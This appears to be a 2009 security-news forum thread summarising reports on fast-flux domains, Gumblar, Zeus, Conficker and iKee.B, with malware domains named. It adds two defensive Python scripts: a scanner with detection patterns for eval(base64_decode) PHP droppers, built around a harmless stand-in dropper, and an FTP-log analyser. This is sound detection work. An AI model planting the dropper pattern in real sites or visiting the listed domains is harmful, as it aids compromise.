November 2, 2009 - "... This year’s seen a huge uptick in Avalanche domains**, and the release of notes from ICANN on the Fast Flux Working Group* as well as a specific note around Avalanche. Arbor, like a few others, has been actively working with registries to address fast flux... Comparing to Q2... the biggest gainers are .tk and .eu, with .uk coming in as a new top 10 player. We’ve been trying to work with .eu as they are being targeted, along with .uk, by the Avalanche guys. However, our efforts in .eu are largely fruitless while Nominet in the UK has defended .uk quite handily. The .tk stuff we’re looking at, as it could be a false positive due to the way that .tk hosts stuff... Across all domain names, in Q3 we saw more TLDs hit, some 34 (against Q2’s 26 distinct TLDs). The attackers are striking at more TLDs in hopes of finding the soft spots, ones that just don’t respond. The average lifetime of a fast flux domain name: 418063 seconds, or about 9.7 days. CN domains are taken down within 7.8 days, EU domain names within 1.6 days, COM domains within 7.23 days, and TK domains within 1.44 days... Average lifetime of all domains in Q2: 21 days. Three weeks! That’s success now that we’re down to under 10 days. A cursory examination of this data suggests that while numbers are up, response times are getting better. This may be something worth cheering. Also, it appears that fast flux is still being used for the same old stuff: phishing, malware, malvertising, child porn, and the like."

(Charts available at the URL above.)

- http://atlas.arbor.net/summary/fastflux

Fast Flux Working Group
* https://st.icann.org/pdp-wg-ff/index.cgi?fast_flux_pdp_wg

** http://threatpost.com/en_us/blogs/avalanche-crimeware-kit-fuels-phishing-attacks-102309


2009-11-05, 16:09

Gumblar authors crash WordPress sites
- http://www.networkworld.com/news/2009/110409-botnet-authors-crash-wordpress-sites.html?hpg1=bn
11/04/2009 - "Webmasters who find an annoying error message on their sites may have caught a big break, thanks to a slip-up by the authors of the Gumblar botnet. Tens of thousands of Web sites, many of them small sites running the WordPress blogging software, have been broken, returning a "fatal error" message in recent weeks. According to security experts those messages are actually generated by some buggy malicious code sneaked onto them by Gumblar's authors... Gumblar's authors apparently made some changes to their Web code... and as a result "the current version of Gumbar effectively breaks WordPress blogs"*... WordPress sites that have crashed because of the buggy code display the following error message:
Fatal error: Cannot redeclare xfm() (previously declared in /path/to/site/index.php(1) : eval()'d code:1)
in /path/to/site/wp-config.php(1) : eval()'d code on line 1
Other sites running software such as Joomla get different fatal-error messages... In effect, the messages warn Gumblar's victims that they've been compromised..."
* http://blog.unmaskparasites.com/2009/11/04/gumblar-breaks-wordpress-blogs-and-other-complex-php-sites/
04 Nov 09

WordPress Exploit Scanner
- http://wordpress.org/extend/plugins/exploit-scanner/
• Version: 0.6
• Last Updated: 2009-11-4
• Requires WordPress Version: 2.7.1 or higher
• Compatible up to: 2.8.5
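An added example, written for this thread and unrelated to the WordPress Exploit Scanner plugin above or to anything in the Network World article: a small Python scanner for the injection shape the error message reveals, an eval() of base64-encoded code prepended on line 1 of several PHP files, which then redeclares the same function (xfm in the quoted error). The sample "site" it scans is built in a temp directory; the injected payload is a made-up stand-in, not real Gumblar code.

```python
from __future__ import annotations

import base64
import re
import tempfile
from collections import defaultdict
from pathlib import Path

# eval() on a line is the usual shape of an injected PHP dropper.
EVAL_RE = re.compile(r"\beval\s*\(", re.I)
# A static base64 literal handed to base64_decode(); we decode it to see what it declares.
B64_LIT_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
FUNC_DECL_RE = re.compile(r"\bfunction\s+([A-Za-z_]\w*)\s*\(")


def decoded_payloads(line: str) -> list[str]:
    """Decoded text of every static base64_decode('...') literal on the line."""
    out = []
    for lit in B64_LIT_RE.findall(line):
        try:
            out.append(base64.b64decode(re.sub(r"\s", "", lit), validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return out


def scan_file(path: Path) -> list[dict]:
    findings = []
    for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
        if not EVAL_RE.search(line):
            continue
        declared = [name for payload in decoded_payloads(line)
                    for name in FUNC_DECL_RE.findall(payload)]
        findings.append({
            "file": path.name, "line": lineno,
            # eval on line 1, closed with ?> before the file's real content: prepended dropper
            "prepended": lineno == 1 and line.lstrip().startswith("<?php") and "?>" in line,
            "functions": declared,
        })
    return findings


def scan_tree(root: Path) -> list[dict]:
    findings = []
    for p in sorted(root.rglob("*.php")):
        findings.extend(scan_file(p))
    return findings


def redeclared_functions(findings: list[dict]) -> dict[str, list[str]]:
    """Functions that injected code declares in more than one file: exactly the
    condition that makes PHP abort with 'Cannot redeclare' once both files load."""
    where: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        for name in f["functions"]:
            where[name].add(f["file"])
    return {name: sorted(files) for name, files in where.items() if len(files) > 1}


# --- constructed sample site (nothing here is real Gumblar code) ---------------
INJECTED_PAYLOAD = "function xfm($a){return $a;} xfm(1);"   # made-up stand-in for the dropper
DROPPER_LINE = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(
    INJECTED_PAYLOAD.encode()).decode()


def build_sample_site(root: Path) -> None:
    (root / "index.php").write_text(DROPPER_LINE + "<?php require 'site-content.php'; ?>\n")
    (root / "wp-config.php").write_text(DROPPER_LINE + "\n<?php define('DB_NAME', 'wp'); ?>\n")
    (root / "wp-includes").mkdir()
    (root / "wp-includes" / "functions.php").write_text("<?php function clean_site() { return 1; } ?>\n")


def run_demo() -> tuple[list[dict], dict[str, list[str]]]:
    root = Path(tempfile.mkdtemp(prefix="gumblar-scan-"))
    build_sample_site(root)
    findings = scan_tree(root)
    return findings, redeclared_functions(findings)


if __name__ == "__main__":
    findings, dupes = run_demo()
    for f in findings:
        print(f"{f['file']}:{f['line']} prepended={f['prepended']} declares={f['functions']}")
    print("redeclared:", dupes)   # {'xfm': ['index.php', 'wp-config.php']}
```

Decoding only static base64 literals keeps the scanner safe to run on a live docroot (nothing is executed); obfuscation that builds the string at runtime will still show up as an eval() finding, just without the function names.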


2009-11-06, 19:16

Gumblar malware domain reactivated
- http://blog.scansafe.com/journal/2009/11/5/gumblarcn-its-baaaack.html
November 5, 2009 - "... some of the compromises were following a different pattern than we'd been seeing over the past couple of weeks. Further investigation revealed the newest iframe injection was pointing once again to gumblar .cn - the malware domain that originally earned Gumblar its name. The domain's reactivation occurred less than 24 hours ago, but it has ramifications that could stretch back for months. Any sites compromised in the May Gumblar attacks that were not yet cleaned up (unfortunately an all-too-common occurrence) could now start becoming vectors of Gumblar infection once again. This is in addition to new compromises pointing to the newly activated gumblar .cn and the already very active Gumblar compromises which are using compromised websites as malware hosts*...
Edited to add: This is not the first example of registrars releasing malware domain names back into use..."
* http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
October 15, 2009

- http://www.iss.net/threats/gumblar.html

- http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... last time Google visited this site was on 2009-11-06, and the last time suspicious content was found on this site was on 2009-11-06... It infected 5918 domain(s)..."
- http://google.com/safebrowsing/diagnostic?site=martuz.cn/
"... last time Google visited this site was on 2009-11-06, and the last time suspicious content was found on this site was on 2009-11-06... It infected 8558 domain(s)..."

- http://www.sophos.com/blogs/sophoslabs/v/post/7342
November 8, 2009


2009-11-11, 19:33

The Gumblar system
- http://www.viruslist.com/en/weblog?weblogid=208187897
November 11, 2009 - "... Analysis of some infected websites showed that the only way to inject the infection of Gumblar was by using FTP access, because those websites have no server-side scripting. Later this was proved by an analysis of FTP log files... it's a fully automated system. It's a new generation of self-building botnets. This system is actively attacking visitors of a website and once these visitors have been infected with the Windows executable, it grabs FTP credentials from the victim machines. The FTP accounts are then used to infect every webpage on new webservers. This way the system extends the number of infected pages, thus attacking more and more computers. The entire process is automated and the owner of the system just needs to adjust the system and update the Trojan executable which steals passwords and the exploits used to attack the browser. The system works in a constant loop of attacking new computers, getting new FTP accounts and infecting new servers..."

(Screenshots available at the URL above.)
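The Kaspersky post says the FTP path was confirmed from FTP log files. As an added example (mine, not Kaspersky's), here is a Python pass over such logs that flags the two signs of that loop from the hosting side: an account suddenly used from a second address, and one session rewriting many web pages in a short burst. The log format is constructed for the demo (it is not vsftpd's or any real server's exact format), and the addresses and account names are made up.

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log shape (assumption; adapt LINE_RE to the real server's transfer log):
#   <date> <time> LOGIN user=<acct> ip=<addr>
#   <date> <time> UPLOAD user=<acct> ip=<addr> path=<remote path>
LINE_RE = re.compile(r"^(\S+ \S+) (LOGIN|UPLOAD) user=(\S+) ip=(\S+)(?: path=(\S+))?$")
WEB_EXT = (".php", ".html", ".htm", ".js")


def parse(lines) -> list[dict]:
    events = []
    for ln in lines:
        m = LINE_RE.match(ln.strip())
        if not m:
            continue  # unrelated or malformed line
        ts, kind, user, ip, path = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "kind": kind, "user": user, "ip": ip, "path": path})
    return events


def multi_ip_accounts(events: list[dict]) -> dict[str, list[str]]:
    """Accounts that logged in from more than one address: a stolen credential
    is replayed from somewhere the real webmaster never uses."""
    ips: dict[str, set[str]] = defaultdict(set)
    for e in events:
        if e["kind"] == "LOGIN":
            ips[e["user"]].add(e["ip"])
    return {u: sorted(s) for u, s in ips.items() if len(s) > 1}


def mass_web_uploads(events: list[dict], min_files: int = 5,
                     window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """(user, ip) pairs that overwrote at least min_files web pages inside one
    window: the 'infect every webpage' step of the loop described above."""
    per_session: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for e in events:
        if e["kind"] == "UPLOAD" and e["path"].lower().endswith(WEB_EXT):
            per_session[(e["user"], e["ip"])].append(e["ts"])
    alerts = []
    for (user, ip), times in per_session.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):          # sliding window over upload times
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_files:
            alerts.append({"user": user, "ip": ip, "files": best})
    return alerts


# Constructed sample: the real webmaster (198.51.100.10) uploads one page; later the
# same credential is used from 203.0.113.7 to rewrite eight pages in under a minute.
SAMPLE_LOG = """\
2009-11-10 09:12:03 LOGIN user=shopsite ip=198.51.100.10
2009-11-10 09:12:40 UPLOAD user=shopsite ip=198.51.100.10 path=/public_html/news.html
2009-11-10 23:41:02 LOGIN user=shopsite ip=203.0.113.7
2009-11-10 23:41:05 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/index.php
2009-11-10 23:41:08 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/index.html
2009-11-10 23:41:11 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/about.html
2009-11-10 23:41:14 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/contact.html
2009-11-10 23:41:17 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/js/menu.js
2009-11-10 23:41:20 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/blog/index.php
2009-11-10 23:41:23 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/blog/post1.html
2009-11-10 23:41:26 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/shop/cart.php
2009-11-10 23:41:29 UPLOAD user=shopsite ip=203.0.113.7 path=/public_html/images/logo.jpg
2009-11-10 23:50:00 LOGIN user=otherclient ip=192.0.2.44
"""

if __name__ == "__main__":
    ev = parse(SAMPLE_LOG.splitlines())
    print("accounts used from several IPs:", multi_ip_accounts(ev))
    print("mass web uploads:", mass_web_uploads(ev))
```

The burst rule on its own fires on a legitimate site redeploy, so in practice the two signals are combined: a burst from an address the account has never used before is the one worth paging on, and the fix is the same either way (rotate the FTP password and clean the uploaded pages, not just one of them).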


2009-12-04, 14:53

Gumblar infection count
- http://www.viruslist.com/en/weblog?weblogid=208187923
December 04, 2009 - "We've now analyzed more than 600 MB of collected data related to the recent resurrection of the Gumblar threat. Overall, we've identified 2000+ Infectors (computers hosting the malicious *.php files and payload) and 76100+ 'Redirectors' (computers with links leading back to the malicious sites). Most Infectors are also part of the group of Redirectors, they serve one *.php file and additionally contain the link to another Infector in their own entry page..."


2009-12-04, 23:36

Max Power - many malware domains
- http://isc.sans.org/diary.html?storyid=7693
Last Updated: 2009-12-04 19:46:31 UTC - "Who is Max Power? Well, we don't know either. It's a pseudonym of a gang or guy who has a decent-sized spyware racket going. Max has been sitting on the same IP address for the past three months, in AS9929, ChinaNet. Even Google knows that 10% of the sites in this AS are malicious. Looking at the IP address in Reverse DNS or MalwareURL.com, we can see the many malware domains "Max Power" has been using in the recent past. Some of the names are associated with the Koobface and Zeus malware families. The address lay dormant for the last week of November, but just woke up again yesterday morning, and is currently serving the malware domain "tempa3-dot-cn". This domain is at the moment linked to from various questionable "pharmaceuticals" web sites, and it currently pushes a bunch of exploits which, if successful, download and run a backdoor of the "TDSS"/"Tidserv" family. Detection was dismal at first*, but has improved a bit over the last 24 hours**."
* http://www.virustotal.com/en/analisis/f7152a760e6182ad4881c5f77d50df1aa1221b5fa0482f5678ddb3101d2c643f-1259872180
File load.exe received on 2009.12.03 20:29:40 (UTC)
Result: 6/40 (15.00%)
** http://www.virustotal.com/en/analisis/f7152a760e6182ad4881c5f77d50df1aa1221b5fa0482f5678ddb3101d2c643f-1259949728
File load.exe received on 2009.12.04 18:02:08 (UTC)
Result: 18/41 (43.90%)


2009-12-10, 10:54

Zeus bot using Amazon as C&C server
- http://www.theregister.co.uk/2009/12/09/amazon_ec2_bot_control_channel/
9 December 2009 - "... a new variant of the Zeus banking trojan has been spotted using the popular Amazon service as a command and control channel for infected machines. After marks get tricked into installing the password-logging malware, their machines began reporting to EC2 for new instructions and updates, according to researchers from CA's internet security business unit*... Over the past few months, accounts on Twitter, Google's app engine, and Facebook have also been transformed into master control channels for machines under the spell of surreptitious malware... According to analysis** from Zero Day blogger Dancho Danchev, the cybercriminals behind Zeus appear to have plugged into Amazon's Relational Database Service as a backend alternative in case they lose access to their original domain..."
* http://community.ca.com/blogs/securityadvisor/archive/2009/12/09/zeus-in-the-cloud.aspx

** http://blogs.zdnet.com/security/?p=5110

- http://sunbeltblog.blogspot.com/2009/12/is-botnet-c-and-c-headed-for-cloud.html
December 10, 2009


2009-12-17, 06:10

Group IDs hotbeds of Conficker worm outbreaks
- http://voices.washingtonpost.com/securityfix/2009/12/group_ids_hotbeds_of_conficker.html
December 16, 2009 - "Internet service providers in Russia and Ukraine are home to some of the highest concentrations of customers whose machines are infected with the Conficker worm, new data suggests. The report comes from the Shadowserver Foundation*, a nonprofit that tracks global botnet infections. Shadowserver tracks networks and nations most impacted by Conficker, a computer worm that has infected more than 7 million Microsoft Windows PCs since it first surfaced last November... Shadowserver's numbers indicate that the largest numbers of Conficker-infested PCs are in the East, more specifically China, India and Vietnam. For example, Chinanet, among the nation's largest ISPs, has about 92 million routable Internet addresses, and roughly 950,000 - or about 1 percent of those addresses - appear to be sickened with Conficker. Security Fix decided to use the group's data in a slightly different way, to showcase the concentration of Conficker victims as viewed against the total number of each ISP's customers. Viewed this way, Russian and Ukrainian ISPs have the highest concentration of customers with Conficker-infected systems... Shadowserver offers all ISPs and Web hosting providers free daily feeds** that can alert network providers to new bot infections on their networks."
* http://www.shadowserver.org/wiki/pmwiki.php/Stats/Conficker

** http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html

- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20091216
16 December 2009


2009-12-19, 00:33

Analysis of the iKee.B (Duh) iPhone Botnet
- http://www.csl.sri.com/users/porras/iPhone-Bot/
14 December 2009 - "... analysis of the iKee.B (duh) Apple iPhone bot client, captured on 25 November 2009. The bot client was released throughout several countries in Europe, with the initial purpose of stealing SMS content and coordinating its infected iPhones via a Lithuanian botnet server. This report details the logic and function of iKee's scripts, its configuration files, and its two binary executables, which we have reverse engineered to an approximation of their C source code implementation. The iKee bot is one of the latest offerings in smartphone malware, in this case targeting jailbroken iPhones. While its implementation is simple in comparison to the latest generation of PC-based malware, its implications demonstrate the potential extension of crimeware to this valuable new frontier of handheld consumer devices...
In early November 2009, Dutch users of jailbroken iPhones in T-Mobile's 3G IP range began experiencing extortion popup windows. The popup window notifies the victim that the phone has been hacked, and then sends that victim to a website where a $5 ransom payment is demanded to remove the malware infection. The teenage hacker who authored the malicious software (malware) had discovered that many jailbroken iPhones have been configured with a secure shell (SSH) network service with a known default root password..."
(Complete analysis at the URL above.)

- http://en.wikipedia.org/wiki/Jailbreak_(iPhone)

- http://www.f-secure.com/weblog/archives/00001822.html
November 22, 2009


2009-12-22, 13:35

Citibank hacked for millions...
- http://www.pcworld.com/businesscenter/article/185271/report_russian_gang_linked_to_big_citibank_hack.html
December 21, 2009 - "U.S. authorities are investigating the theft of an estimated tens of millions of dollars from Citibank by hackers partly using Russian software tailored for the attack, according to a news report. The security breach at the major U.S. bank was detected mid-year based on traffic from Internet addresses formerly used by the Russian Business Network gang, The Wall Street Journal said Tuesday*, citing unnamed government sources. The Russian Business Network is a well-known group linked to malicious software, hacking, child pornography and spam. The Federal Bureau of Investigation is probing the case, the report said. It was not known whether the money had been recovered and a Citibank representative said the company had not had any system breach or losses, according to the report. The report left unclear who the money was stolen from but said a program called Black Energy, designed by a Russian hacker, was one tool used in the attack. The tool can be used to command a botnet, or a large group of computers infected by malware and controlled by an attacker, in assaults meant to take down target Web sites. This year a modified version of the software appeared online that could steal banking information, and in the Citi attack a version tailored to target the bank was used, the Journal said. The attackers also targeted a U.S. government agency and one other unnamed entity, the report said, adding that it was unknown if the attackers accessed Citibank systems directly or through other parties."
* http://online.wsj.com/article/SB126145280820801177.html

- http://finance.yahoo.com/news/Report-FBI-probes-hacker-apf-2149710519.html?x=0
December 22, 2009 - "... Citigroup denied the report. "We had no breach of the system and there were no losses, no customer losses, no bank losses," said Joe Petro, managing director of Citigroup's Security and Investigative services. "Any allegation that the FBI is working a case at Citigroup involving tens of millions of losses is just not true"..."